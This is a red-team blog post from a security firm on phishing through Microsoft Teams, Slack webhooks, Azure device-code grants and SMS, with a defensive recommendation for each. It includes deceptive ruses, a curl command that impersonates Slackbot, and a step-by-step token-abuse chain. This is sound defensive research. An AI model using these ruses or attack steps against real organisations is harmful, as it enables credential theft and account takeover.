Thinking Outside the Mailbox: Modernized Phishing Techniques

As defensive controls have advanced, so too have adversaries’ approaches to social engineering. Landing a phishing email in an inbox has become harder, and most campaigns that do make it to an inbox are quickly reported, quarantined, or triaged. So, adversaries have asked themselves why not skip the inbox all together or leverage a service so trusted that even email security solutions trust it? In response, Praetorian’s Red Team has been working to weaponize and automate modern social engineering tactics, techniques, and procedures (TTPs) that often emulate real world threats. With the caveat that attack vectors are only as good as the pretext surrounding a social engineering campaign (why would I click this link or follow these directions), Praetorian has used these TTPs–or modernized phishing techniques–to identify gaps in real-world enterprise organizations.

A Word on Innovation

Some of the TTPs we will describe are not novel in the sense that Praetorian originally identified their abuse capabilities (please do read the references for credits, because as an industry we continuously stand on the shoulders of giants). What is novel is the way our Red Team has further developed existing capabilities and concepts to provide class-leading threat emulation capabilities to authorized targets. As much as our Red Team enjoys leveraging these attack vectors, Praetorian’s mission is to make the world a safer and more secure place. We do that in this post by providing insights into our Red Team’s innovative approaches and defensive recommendations.

Microsoft Teams

One of the growing trends in leveraging “trusted” services is to conduct phishing via Microsoft Teams. If an organization is using Office 365 and has their Teams chat set to allow communication outside of the organization, external attackers have a direct line of communication with employees. This vector presents a particularly convincing phishing guise as many employees will implicitly trust direct messages sent to their corporate Teams account. Additionally, Phishing via Teams allows for near-instant communication between the target and the attacker, giving the attacker an opportunity to interactively speak with the compromised target.

Our Approach

To conduct a Teams phishing campaign, the attacker needs two accounts: the main sending account and a secondary account to be attached to the message. The purpose of the second account is to convert the message with the target to a “Group Chat”. Group Chats go straight through to the target, whereas direct messages will first prompt the target to accept communication from someone outside of their organization.

In past Red Team engagements, the Praetorian Red Team has successfully used this technique to distribute malware to targets and convince compromised targets to accept Multi-Factor Authentication (MFA) pushes sent to their device. To convince users to accept MFA pushes, we messaged the compromised target that IT had detected an issue with their MFA setup and would be conducting testing to troubleshoot the problem. Then we asked the target to “please accept all MFA pushes for the next hour”.

For malware (command and control) delivery, one particularly effective ruse that we have used is messaging a target that their laptop is out of compliance and they must run an IT-provided executable to comply. The target would receive a message similar to the one in Figure 1:

Figure 1: Example message received by phishing target.

Our Recommendation

To mitigate this Phishing ruse, organizations can modify their Teams workspace settings via the Teams administration portal via the section labeled “External Access” (see Figure 2). This page offers three main options to configure: “Teams and Skype for Business users in external organizations”, “Teams accounts not managed by an organization”, and “Skype Users”.  If possible, Praetorian recommends disallowing communication with all external domains, unmanaged accounts, and skype users.

Figure 2: Teams configuration with all communication disallowed.

However, your organization may have legitimate business needs that require a Teams configuration allowing external users. If disabling all external access to Teams is unfeasible, explore the following alternatives:

  1. Using allow lists to only allow certain domains access to the organization’s Teams accounts.
  2. Disallowing access to Teams accounts from unmanaged accounts (such as “outlook.com ” accounts.

Slack Webhooks

Instead of Teams, many organizations opt to use Slack for their day-to-day communications. Slack-based phishing typically requires access to a compromised account or system, but this isn’t always the case.

Our Approach

Slack webhooks may look like normal URLs at first glance, but contain all the information needed to send messages within their corresponding Slack workspace. Furthermore, the deprecated-but-still-widely-used “legacy” webhook variant (formally called “Incoming Webhooks”) allows the sender to specify message properties like sender username, profile picture, and destination channel/user.

An attentive user might notice the additional APP tag appended to Slackbot’s name in Figure 3.

Figure 3: Slack message sent via a Slack webhook impersonating Slackbot.

Further investigation usually shows that the Slack integration was likely added by a Slack administrator or IT team member, as Figure 4 shows.

Figure 4: The custom integration was added by a Slack Administrator.

If an attacker can obtain a valid, legacy Slack webhook, they can send a simple cURL request to get a malicious message in the direct messages of an employee. Following is the cURL request for the message in Figure 4:

```

curl -X POST --data-urlencode "payload={"channel": "@target", "username": "SIackbot", "text": "This is an attacker-controlled message from Slackbot!", "icon_url": "https://a.slack-edge.com/80588/marketing/img/avatars/slackbot/avatar-slackbot@2x.png"}" https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX

```

Note that the sending username uses an upper-case letter “i” in the place of the lower-case letter “L”, as the actual name “Slackbot” is reserved.

General techniques like Slackbot impersonation can be effective, but ruses informed by the target environment have the potential to be much more convincing. For example, if the target organization is known to use Okta, attackers may develop a ruse similar to the one shown in Figure 5.

Figure 5: An example credential capture campaign impersonating Okta within Slack.

To mitigate this issue, Slack has deprecated “legacy” webhooks and introduced a more restricted model, Slack apps, in which access must be granted on a per-channel basis. While the potential for phishing still exists with these newer webhooks, the possibilities are much more restricted. Regardless, many organizations that leverage Slack webhooks continue to use the legacy version, giving attackers a powerful tool for social engineering.

Our Recommendation

The best practice for securing your organization from Slack webhook phishing is to remove the legacy webhook integration and treat any existing webhooks as sensitive data. As the Slack documentation puts it; “Keep it secret, keep it safe. Your webhook URL contains a secret. Don’t share it online, including via public version control repositories.” If possible, migrate any of your existing Slack workflows to the newer and more secure Slack app model, which significantly reduces the impact of a Slack webhook exposure.

Identifying legacy webhooks can be tricky, as their format is visually identical to webhooks generated following current-day, best practices. They both have three fields within the URL, a value beginning with T, a value beginning with B, and 24 random characters. These values are the Slack workspace ID, the integration/bot ID for the webhook, and a secret value respectively.

The solution is to use the integration/bot ID value to determine which integration or application was used to generate the webhook. Navigate to https://<workspace-name>.slack.com/services/B00000000 using the ID in question as the final value in the URL. If the URL is for a legacy webhook, the Incoming WebHooks Custom Integration will open. If the URL is for a non-legacy webhook, the website will redirect you to the Slack app the administrator used to generate the webhook.

Azure Device Code Phishing

Device code phishing is a specific type of “illicit consent grant” social engineering attack. At a high level, it abuses the OAuth 2.0 grant flow typically used by devices without an interactive browser or limited input capacity (e.g., TVs, IoT devices, printers). During a device code phishing attempt attack, an attacker triggers the device code grant for an OAuth application and tricks the compromised target into approving and authorizing the request. If successful, the attacker obtains a valid refresh token for a protected resource, typically with a 90 day lifetime.

Overall, Praetorian has found device code phishing to be a very effective technique, primarily due to the lack of traditional indicators that may raise alarm in compromised target users. Specifically,

  • All end user interaction and authentication occurs with the legitimate login.microsoftonline.com,
  • Consent screen does not display the implied permission scope, and
  • Traditional security awareness training typically does not include client impersonation illicit consent attacks.

Our Approaches

Consent Behavior in OAuth Client Impersonation

As expected, Azure Active Directory (AAD) implements the OAuth 2.0 standard, including device code grants, but a couple important quirks make AAD an effective target in particular for device code phishing.

First is the consent behavior attackers encounter when doing OAuth client impersonation using pre-authorized “first-party” applications as client IDs in the device code grant. This is far more deceptive than impersonating third-party applications. Traditional third-party OAuth illicit consent grants require attackers to register a malicious app which “needs” broad permissions, and then requires compromised targets to explicitly approve access for each permission for that third-party application, as in Figure 6. In contrast, Microsoft provides “implied consent” for first-party applications, which they include in every tenant by default (e.g, Teams, Office, OneNote, etc.). Since these first-party applications are also public OAuth clients, they do not use secrets or certificates when redeeming an authorization code. Therefore, attackers can mimic these applications, inherit their implied consent, and still obtain the resulting refresh token.

Figure 6: Consent screen for a sample malicious third-party app named “Risky App” versus for a first-party client impersonation

Family of Client IDs

Secondly, Microsoft implements a minimally documented feature called “Family of Client IDs” (FOCI), which disregards standard OAuth security safeguards and allows special refresh tokens to mint new access tokens for other “family” application resources. This means if you obtain a refresh token to something like the Microsoft Graph API resource from a FOCI client ID, the token is not strictly bound to that resource. Therefore, a FOCI refresh token effectively provides access to the union of all scopes in the family, significantly increasing the reach of an attack. Additionally, from a logging/audit perspective, access tokens minted from refresh tokens do not appear in AAD interactive sign-in logs.

FOCI refresh tokens therefore can provide a highly effective and dangerous access vector, especially when combined with device code phishing against AAD. For example, our engineers have conducted the follow device code phishing access chain:

  1. Initiate the device code phish with client impersonation for a FOCI application (this can be automated with tools such as TokenTactics and AADInternals). The initial targeted resource will be the Azure AD Graph API
  2. Convince a user to input the generated code and approve the grant with implied consent
    1. Vishing or Smishing can be helpful here
  3. Upon approval, obtain initial refresh token (logged as an interactive sign-in)
  4. Use the token to access and dump the AAD directory
    1. Can analyze valuable information on users/groups/applications
    2. Can explore AAD for other security weaknesses
  5. Mint access tokens for other resources (Teams channels/messages perhaps) for 90 days

Our Recommendations

Organizations can implement four primary mitigations against abusing FOCI refresh tokens:

  • Conditional Access Policies: Focus on hardening sensitive resources and consider including “All Cloud Apps” in your policy criteria. However, be aware that MFA conditional access control requirements may not block minted access tokens since these refresh token grants are non-interactive and will inherit any MFA claim from the original token.
  • Auditing Interactive Sign-In Logs: Look for suspicious activity and/or “impossible traveler” type events, as the initial refresh token grant will be logged with the device/location from which the attacker initiated their device code grant.
  • Auditing Non-Interactive Sign-In Logs: A user creating an access token from a refresh token does generate an event, but it only appears in the less monitored non-interactive sign-in log. Defenders should monitor these for known FOCI client abuse.

Revoking Refresh Tokens: In most circumstances, a password reset does not automatically invalidate previously issued refresh tokens. Consider including the `Revoke-AzureADUserAllRefreshToken` PowerShell AzureAD cmdlet in incident response playbooks to revoke refresh tokens for potentially compromised accounts.

SMS Based Phishing (Smishing)

Organizations often include end-user security awareness training as part of their security programmes. However, these often only cover email. Traditional security measures already subject email communications to Secure Email Gateway appliances and services with decades of research and development behind them. Additionally, organizations parse hyperlinks and attachments contained within email content and subject them to further scrutiny.

Our Approach

Given the difficulty of using reputable domains and services for landing successful email based phishing campaigns, Short Message Service (SMS) has become an additional vector in an attacker’s toolkit.Enterprises lack visibility into the SMS messages that their employees receive, meaning that an attacker can be confident that their target will receive the message. SMS phishing guise often entices the target to visit an included hyperlink and hand over credentials or other sensitive information as opposed to attempting to install malicious software on their mobile device. The hyperlink contained within a malicious SMS message directs visiting employees to a phishing portal. Enterprises lack the scope to enforce egress traffic control over employees’ devices and so the compromised target is likely able to visit the phishing page and hand over credentials without being interrupted by technical security controls.

In some countries, such as the United Kingdom, the attacker can specify the name sent with their SMS, such as the “ACME” sender in Figure 7 in lieu of a mobile number. Other countries are more restrictive, and only allow mobile numbers or short numbers. Attackers cannot acquire the latter ad-hoc as it requires a formal approval process.

Figure 7: Example of a Smishing Message on a target’s device

Our Recommendation

The prevalence of remote-work has meant that the majority of organizations now offer employees the ability to access organizational resources, such as email, using their mobile device. IT departments achieve this through Bring Your Own Device (BYOD) and Managed Device Management (MDM) approaches. These efforts to introduce enterprise security controls to mobile devices are able to address many potential threats, but notSmishing. Employees are unlikely to want their employers to have visibility over communication channels that will contain personal information.

The most effective way to mitigate the risks of Smishing attacks is to ensure the use of Multi-Factor Authentication (MFA) on all login endpoints, ideally with the use of U2F. An attacker who is able to capture credentials will have to take additional steps to successfully use them, imposing costs and increasing the opportunity for detection. However, the use of MFA will not prevent Smishing attacks that do not aim to obtain login credentials. In these cases, old fashioned end-user security awareness should come into play.

Theory Versus Reality

We encourage you to ask yourself whether your organization currently possesses the capability to prevent attacks that use these vectors. Are you able to detect them and are you confident in your ability to respond? Even if the answers to these questions are a reassuring “yes,” consider the benefit your security team would derive from testing those assumptions in a forum designed for them to exercise their defensive capabilities. Given the ever changing nature of attack vectors and defenses, the best way to make sure that your TTPs will be effective in a real-life phishing scenario is to pressure test them periodically.

References:

Microsoft Teams Abuse | mr.d0x
Slack phishing attacks using webhooks | AT&T Alien Labs

Incoming Webhooks | Slack

OAuth 2.0 device code flow – Microsoft Entra

Revoke-AzureADUserAllRefreshToken (AzureAD) | Microsoft Docs

GitHub – secureworks/family-of-client-ids-research: Research into Undocumented Behavior of Azure AD Refresh Tokens

Introducing a new phishing technique for compromising Office 365 accounts

The Identity of OAuth Public Clients | Okta Developer

About the Authors

Jon Goodgion

Jon Goodgion

Jon is a Lead Security Engineer at Praetorian with a background in military and intelligence cyber operations. He is focused on Red Team engagements and testing defensive controls against the latest threats.

Mason Davis

Mason Davis

Mason is a Senior Security Engineer at Praetorian. He primarily specializes in Red Teaming and other Corporate Security-focused service lines.

Matt Jackoski

Matt Jackoski

Matt is a Red Team operator at Praetorian and currently is focused on performing adversarial emulation engagements for clients. Matt has a background in computer science and engineering with a focus in offensive security.

Nate Kirk

Nate Kirk

Nate is a Senior Practice Manager at Praetorian, currently managing the Praetorian Red Team and other offensive-based operations. Nate comes from an engineering background and specializes in Red Teaming, Purple Teaming and attack path mapping.

Walter Sagehorn

Walter Sagehorn

Walter is a Senior Security Engineer who enjoys providing clients with an attacker's perspective of their network through Red Teams and other adversarial exercises.

Catch the Latest

Catch our latest exploits, news, articles, and events.

Ready to Discuss Your Next Continuous Threat Exposure Management Initiative?

Praetorian’s Offense Security Experts are Ready to Answer Your Questions

0 Shares
Copy link